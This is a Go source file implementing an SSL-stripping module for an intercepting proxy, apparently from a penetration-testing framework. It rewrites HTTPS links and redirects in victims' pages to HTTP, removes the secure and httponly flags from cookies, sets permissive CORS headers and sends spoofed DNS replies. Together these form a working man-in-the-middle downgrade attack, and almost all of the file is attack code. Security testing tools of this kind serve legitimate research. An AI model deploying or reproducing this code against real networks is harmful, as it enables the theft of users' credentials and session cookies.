2024-08-09 18:19:21 +02:00

309 lines
9.3 KiB

package http_proxy
import (
var (
httpsLinksParser = regexp.MustCompile(`https://[^"'/]+`)
domainCookieParser = regexp.MustCompile(`; ?(?i)domain=.*(;|$)`)
flagsCookieParser = regexp.MustCompile(`; ?(?i)(secure|httponly)`)
type SSLStripper struct {
enabled bool
session *session.Session
cookies *CookieTracker
hosts *HostTracker
handle *pcap.Handle
pktSourceChan chan gopacket.Packet
func NewSSLStripper(s *session.Session, enabled bool) *SSLStripper {
strip := &SSLStripper{
enabled: false,
cookies: NewCookieTracker(),
hosts: NewHostTracker(),
session: s,
handle: nil,
return strip
func (s *SSLStripper) Enabled() bool {
return s.enabled
func (s *SSLStripper) onPacket(pkt gopacket.Packet) {
typeEth := pkt.Layer(layers.LayerTypeEthernet)
typeUDP := pkt.Layer(layers.LayerTypeUDP)
if typeEth == nil || typeUDP == nil {
eth := typeEth.(*layers.Ethernet)
dns, parsed := pkt.Layer(layers.LayerTypeDNS).(*layers.DNS)
if parsed && dns.OpCode == layers.DNSOpCodeQuery && len(dns.Questions) > 0 && len(dns.Answers) == 0 {
udp := typeUDP.(*layers.UDP)
for _, q := range dns.Questions {
domain := string(q.Name)
original := s.hosts.Unstrip(domain)
if original != nil && original.Address != nil {
redir, who := dns_spoof.DnsReply(s.session, 1024, pkt, eth, udp, domain, original.Address, dns, eth.SrcMAC)
if redir != "" && who != "" {
log.Debug("[%s] Sending spoofed DNS reply for %s %s to %s.", tui.Green("dns"), tui.Red(domain), tui.Dim(redir), tui.Bold(who))
func (s *SSLStripper) Enable(enabled bool) {
s.enabled = enabled
if enabled && s.handle == nil {
var err error
if s.handle, err = network.Capture(s.session.Interface.Name()); err != nil {
if err = s.handle.SetBPFFilter("udp"); err != nil {
go func() {
defer func() {
s.handle = nil
for s.enabled {
src := gopacket.NewPacketSource(s.handle, s.handle.LinkType())
s.pktSourceChan = src.Packets()
for packet := range s.pktSourceChan {
if !s.enabled {
func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
for name, values := range res.Header {
for _, value := range values {
if name == "Content-Type" {
return strings.HasPrefix(value, "text/") || strings.Contains(value, "javascript")
return false
func (s *SSLStripper) stripURL(url string) string {
return strings.Replace(url, "https://", "http://", 1)
// sslstrip preprocessing, takes care of:
// - handling stripped domains
// - making unknown session cookies expire
func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
if !s.enabled {
// handle stripped domains
original := s.hosts.Unstrip(req.Host)
if original != nil {
log.Info("[%s] Replacing host %s with %s in request from %s and transmitting HTTPS", tui.Green("sslstrip"), tui.Bold(req.Host), tui.Yellow(original.Hostname), req.RemoteAddr)
req.Host = original.Hostname
req.URL.Host = original.Hostname
req.Header.Set("Host", original.Hostname)
req.URL.Scheme = "https"
if !s.cookies.IsClean(req) {
// check if we need to redirect the user in order
// to make unknown session cookies expire
log.Info("[%s] Sending expired cookies for %s to %s", tui.Green("sslstrip"), tui.Yellow(req.Host), req.RemoteAddr)
redir = s.cookies.Expire(req)
func (s *SSLStripper) fixCookiesInHeader(res *http.Response) {
origHost := res.Request.URL.Hostname()
strippedHost := s.hosts.Strip(origHost /* unstripped */)
if strippedHost != nil && /*strippedHost.Hostname != origHost && */ res.Header["Set-Cookie"] != nil {
// origHost is being tracked.
// get domains from hostnames
if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 {
origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1]
strippedDomain := strippedParts[len(strippedParts)-2] + "." + strippedParts[len(strippedParts)-1]
log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname))
cookies := make([]string, len(res.Header["Set-Cookie"]))
// replace domain= and strip "secure" flag for each cookie
for i, cookie := range res.Header["Set-Cookie"] {
domainIndex := domainCookieParser.FindStringIndex(cookie)
if domainIndex != nil {
cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:]
cookie = strings.Replace(cookie, "https://", "http://", -1)
cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "")
res.Header["Set-Cookie"] = cookies
func (s *SSLStripper) fixResponseHeaders(res *http.Response) {
res.Header.Set("Allow-Access-From-Same-Origin", "*")
res.Header.Set("Access-Control-Allow-Origin", "*")
res.Header.Set("Access-Control-Allow-Methods", "*")
res.Header.Set("Access-Control-Allow-Headers", "*")
func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
if !s.enabled {
orig := res.Request.URL
origHost := orig.Hostname()
// is the server redirecting us?
if res.StatusCode != 200 {
// extract Location header
if location, err := res.Location(); location != nil && err == nil {
newHost := location.Host
newURL := location.String()
// are we getting redirected from http to https?
// orig.Scheme is set to "https" during Process->REQUEST above. Can not check it.
// if orig.Scheme == "http" && location.Scheme == "https" {
if location.Scheme == "https" {
log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost))
// strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name
strippedURL := s.stripURL(newURL)
parsed, _ := url.Parse(strippedURL)
if parsed.Port() == "443" || parsed.Port() == "" {
if parsed.Port() == "443" {
// Check for badly formatted "Location:"
// Prevent stripping to "Location:"
// and instead strip to "Location:"
strippedURL = strings.Replace(strippedURL, ":443", "", 1)
hostStripped := parsed.Hostname()
hostStripped, _ = idna.ToASCII(hostStripped)
s.hosts.Track(newHost, hostStripped)
res.Header.Set("Location", strippedURL)
// if we have a text or html content type, fetch the body
// and perform sslstripping
if s.isContentStrippable(res) {
raw, err := ioutil.ReadAll(res.Body)
if err != nil {
log.Error("Could not read response body: %s", err)
body := string(raw)
urls := make(map[string]string)
matches := httpsLinksParser.FindAllString(body, -1)
for _, u := range matches {
// make sure we only strip valid URLs
if parsed, _ := url.Parse(u); parsed != nil {
// strip the URL down to an alternative HTTP version
urls[u] = s.stripURL(u)
nurls := len(urls)
if nurls > 0 {
plural := "s"
if nurls == 1 {
plural = ""
log.Info("[%s] Stripping %d SSL link%s from %s", tui.Green("sslstrip"), nurls, plural, tui.Bold(res.Request.Host))
for u, stripped := range urls {
log.Debug("Stripping url %s to %s", tui.Bold(u), tui.Yellow(stripped))
body = strings.Replace(body, u, stripped, -1)
// save stripped host to an ASCII Internationalized Domain Name
parsed, _ := url.Parse(u)
hostOriginal := parsed.Hostname()
parsed, _ = url.Parse(stripped)
hostStripped := parsed.Hostname()
hostStripped, _ = idna.ToASCII(hostStripped)
s.hosts.Track(hostOriginal, hostStripped)
res.Header.Set("Content-Length", strconv.Itoa(len(body)))
// reset the response body to the original unread state
// but with just a string reader, this way further calls
// to ioutil.ReadAll(res.Body) will just return the content
// we stripped without downloading anything again.
res.Body = ioutil.NopCloser(strings.NewReader(body))
// fix cookies domain + strip "secure" + "httponly" flags
// 302/Location redirect might set cookies as well. Always try to fix Cookies